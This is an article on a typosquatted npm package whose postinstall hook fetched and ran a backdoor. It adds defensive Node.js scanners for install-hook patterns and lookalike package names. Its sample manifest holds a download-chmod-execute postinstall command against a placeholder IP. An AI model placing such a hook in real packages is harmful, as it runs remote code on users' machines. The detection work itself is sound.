Malicious actors increasingly target public open-source repositories with malware disguised as legitimate packages; the payloads typically steal sensitive data or download further malware.
Security researchers constantly identify such malicious packages and report them to repository maintainers for removal, but the sheer scale of these repositories makes it impossible to catch every threat, so many suspicious packages go unnoticed.
A recent npm package (legacyreact-aws-s3-typescript@1.2.4) was flagged as malicious because of its postinstall script, which downloads and executes a second-stage ELF binary; analysis of that binary showed it to be a backdoor.
The backdoor connects to a specific IP address and accepts commands over a standard shell. The researchers reported the package to npm for further investigation.
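As an added illustration (not code from the article or from the researchers who analysed the package), the following Node.js script applies the kind of heuristic a reviewer can run over a package's package.json before installing it: it inspects the install-time lifecycle hooks (preinstall, install, postinstall, prepare) for commands that fetch content from the network and then execute it, which is the shape of the postinstall behaviour described above. The sample manifests are constructed to mirror that behaviour; the package names, the URL and path, and the 203.0.113.10 address (an RFC 5737 documentation range) are placeholders, not the real package's indicators.

```javascript
// Added example: heuristic review of install-time lifecycle hooks in a package.json.
// Not the analysed package's real script; the sample manifests below are constructed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each pattern is one building block of a download-and-run install hook.
const SUSPICIOUS_PATTERNS = [
  { id: 'net-fetch',     re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i,     why: 'fetches content from the network at install time' },
  { id: 'pipe-to-shell', re: /\|\s*(ba|z|da)?sh\b/,                        why: 'pipes fetched content straight into a shell' },
  { id: 'chmod-exec',    re: /\bchmod\s+(\+x|[0-7]{3,4})\b/,               why: 'marks a file executable' },
  { id: 'raw-ip-url',    re: /https?:\/\/\d{1,3}(\.\d{1,3}){3}/,           why: 'contacts a bare IP address instead of a hostname' },
  { id: 'tmp-exec',      re: /(^|[;&|]\s*)(\.\/|\/tmp\/|\/var\/tmp\/)\S+/, why: 'executes a file from a temp or package-local path' },
  { id: 'decode',        re: /\b(base64\s+(-d|--decode)|atob\(|Buffer\.from\([^)]*base64)/, why: 'decodes an encoded payload' },
  { id: 'inline-eval',   re: /\b(node\s+-e|eval\s*\()/,                    why: 'runs inline code' },
];

// Returns one finding per (hook, pattern) hit. scriptFiles maps a file name the hook
// invokes (e.g. "install.js") to that file's contents, so a payload hidden behind an
// innocent-looking "node install.js" is still seen when the caller supplies the file.
function scanLifecycleScripts(pkg, scriptFiles = {}) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    let text = cmd;
    for (const [file, body] of Object.entries(scriptFiles)) {
      if (cmd.includes(file)) text += '\n' + body;
    }
    for (const p of SUSPICIOUS_PATTERNS) {
      if (p.re.test(text)) findings.push({ hook, pattern: p.id, why: p.why });
    }
  }
  return findings;
}

// "high" only when the hook both obtains something from the network and runs something:
// that combination is the download-and-execute pattern described for the malicious package.
function riskLevel(findings) {
  const ids = new Set(findings.map((f) => f.pattern));
  const fetches = ids.has('net-fetch') || ids.has('raw-ip-url');
  const executes = ids.has('pipe-to-shell') || ids.has('chmod-exec') || ids.has('tmp-exec') || ids.has('inline-eval');
  if (fetches && executes) return 'high';
  if (findings.length > 0) return 'medium';
  return 'low';
}

// Constructed sample modelled on the behaviour in the article. NOT the real package's
// script: 203.0.113.10 is an RFC 5737 documentation address, not the backdoor's server.
const SUSPICIOUS_PKG = {
  name: 'example-lookalike-pkg',
  version: '1.2.4',
  scripts: {
    postinstall: 'curl -s http://203.0.113.10/stage2 -o /tmp/.s2 && chmod +x /tmp/.s2 && /tmp/.s2 &',
  },
};

// Constructed benign sample: a local build step, no network access, nothing fetched is run.
const BENIGN_PKG = {
  name: 'example-clean-pkg',
  version: '1.1.5',
  scripts: { postinstall: 'node scripts/build-native.js', test: 'jest' },
};

for (const pkg of [SUSPICIOUS_PKG, BENIGN_PKG]) {
  const findings = scanLifecycleScripts(pkg);
  console.log(`${pkg.name}@${pkg.version}: ${riskLevel(findings)}`, findings.map((f) => `${f.hook}: ${f.why}`));
}
```

To run a check like this before anything executes, fetch the tarball with `npm pack <name>@<version>`, unpack it and point the script at the extracted package.json; `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) blocks lifecycle hooks outright. The heuristics catch the download-and-run shape only; a payload living in a bundled .js file is invisible unless that file's contents are passed in through `scriptFiles`.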
A new free service, Spectra Assure Community, has been introduced to help developers assess the risk of open-source packages before deploying them. It scans popular repositories such as npm for suspicious behaviors and surfaced, among others, the recently discovered npm package “legacyreact-aws-s3-typescript”.
This malicious package mimicked the legitimate “react-aws-s3-typescript” but carried dormant malicious code. Spectra Assure Community aims to prevent such software supply chain attacks by giving developers visibility into potential threats inside open-source packages.
Malicious actors published an npm package named legacyreact-aws-s3-typescript that typosquats the legitimate react-aws-s3-typescript. The two packages have identical landing pages and functionality, because the malicious package's functional code was copied and pasted from the original.
To appear more legitimate, the malicious package was first published with the same version number (1.1.5) as the latest release of the legitimate package, despite appearing much later, which suggests an attempt to trick developers into treating it as a legitimate update.
Researchers at ReversingLabs identified the malicious package legacyreact-aws-s3-typescript on npm. Its initial versions were clean apart from unusual postinstall scripts; later, suspicious versions were uploaded and quickly removed.
Malicious versions (1.2.1, 1.2.2, and likely 1.1.9) carrying the same malicious code as the eventually detected version 1.2.4 were also briefly available. This highlights the difficulty of tracking open-source threats: the early versions look legitimate, and the malicious ones appear only fleetingly.
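As an added example (not code from the article, from npm or from ReversingLabs), the following Node.js script encodes the signals described in the two passages above: a name derived from an established package, reuse of that package's version number long after the original release, and a snapshot diff that names versions which have since disappeared from the registry, which is the only way to keep a record of releases that were uploaded and quickly removed. It works on the shape of npm's registry metadata (the packument returned for GET https://registry.npmjs.org/<name>, with its `dist-tags`, `versions` and `time` fields), but the package names, dates and version lists below are constructed stand-ins for the real pair, and the 180-day threshold is an arbitrary assumption.

```javascript
// Added example: flag a package whose name and version history mimic an established package.
// Inputs follow npm's packument shape (dist-tags / versions / time); all data below is constructed.
const DAY_MS = 24 * 60 * 60 * 1000;

// Levenshtein edit distance, single-row dynamic programming.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

// How the candidate name relates to the legitimate one: an added prefix/suffix
// ("legacy" + name, the pattern in the article), a near-miss spelling, or unrelated (null).
function nameRelation(candidate, legit) {
  if (candidate === legit) return null;
  const idx = candidate.indexOf(legit);
  if (idx !== -1) {
    return { kind: 'affix', added: candidate.slice(0, idx) + candidate.slice(idx + legit.length) };
  }
  const distance = levenshtein(candidate, legit);
  return distance <= 2 ? { kind: 'edit-distance', distance } : null;
}

function daysBetween(laterIso, earlierIso) {
  return Math.round((Date.parse(laterIso) - Date.parse(earlierIso)) / DAY_MS);
}

// candidate / legit: packument-like objects. previousSnapshot: the candidate's version list
// saved on an earlier poll, so versions removed from the registry since can still be named.
function assessLookalike(candidate, legit, previousSnapshot = [], minGapDays = 180) {
  const reasons = [];
  const rel = nameRelation(candidate.name, legit.name);
  if (!rel) return { suspicious: false, reasons, removedVersions: [] };
  reasons.push(rel.kind === 'affix'
    ? `name is ${legit.name} with "${rel.added}" added`
    : `name is within ${rel.distance} edit(s) of ${legit.name}`);

  const latest = (legit['dist-tags'] || {}).latest;
  const cTime = candidate.time || {};
  const lTime = legit.time || {};
  // Same version number as the original's latest release, but published much later.
  if (latest && cTime[latest] && lTime[latest]) {
    const gap = daysBetween(cTime[latest], lTime[latest]);
    if (gap > minGapDays) reasons.push(`reuses version ${latest}, published ${gap} days after the original release`);
  }
  // A brand-new package starting at a mature project's version numbering.
  if (cTime.created && lTime.created) {
    const age = daysBetween(cTime.created, lTime.created);
    if (age > minGapDays) reasons.push(`package first created ${age} days after the original`);
  }
  // Versions present on the earlier poll that the registry no longer lists.
  const current = new Set(Object.keys(candidate.versions || {}));
  const removedVersions = previousSnapshot.filter((v) => !current.has(v));
  if (removedVersions.length) reasons.push(`versions seen earlier but gone now: ${removedVersions.join(', ')}`);

  // A lookalike name alone is weak evidence (forks, scoped mirrors); require a second signal.
  return { suspicious: reasons.length >= 2, reasons, removedVersions };
}

// Constructed packument fragments standing in for the real legitimate/lookalike pair.
const LEGIT = {
  name: 'example-aws-s3-ts',
  'dist-tags': { latest: '1.1.5' },
  versions: { '1.1.3': {}, '1.1.4': {}, '1.1.5': {} },
  time: { created: '2021-03-01T00:00:00.000Z', '1.1.3': '2021-03-01T00:00:00.000Z',
          '1.1.4': '2021-06-01T00:00:00.000Z', '1.1.5': '2021-09-01T00:00:00.000Z' },
};
const LOOKALIKE = {
  name: 'legacyexample-aws-s3-ts',
  'dist-tags': { latest: '1.2.4' },
  versions: { '1.1.5': {}, '1.2.4': {} },
  time: { created: '2024-08-20T00:00:00.000Z', '1.1.5': '2024-08-20T00:00:00.000Z',
          '1.2.4': '2024-09-10T00:00:00.000Z' },
};
// Constructed earlier snapshot: two versions that were live for a short time and then removed.
const SEEN_EARLIER = ['1.1.5', '1.2.1', '1.2.2'];

console.log(JSON.stringify(assessLookalike(LOOKALIKE, LEGIT, SEEN_EARLIER), null, 2));
```

The snapshot diff is the part that matters for fleeting releases: a scanner that only looks at the registry's current state never sees a version that was published and pulled between two polls, so the version list has to be recorded on each poll and compared with the next.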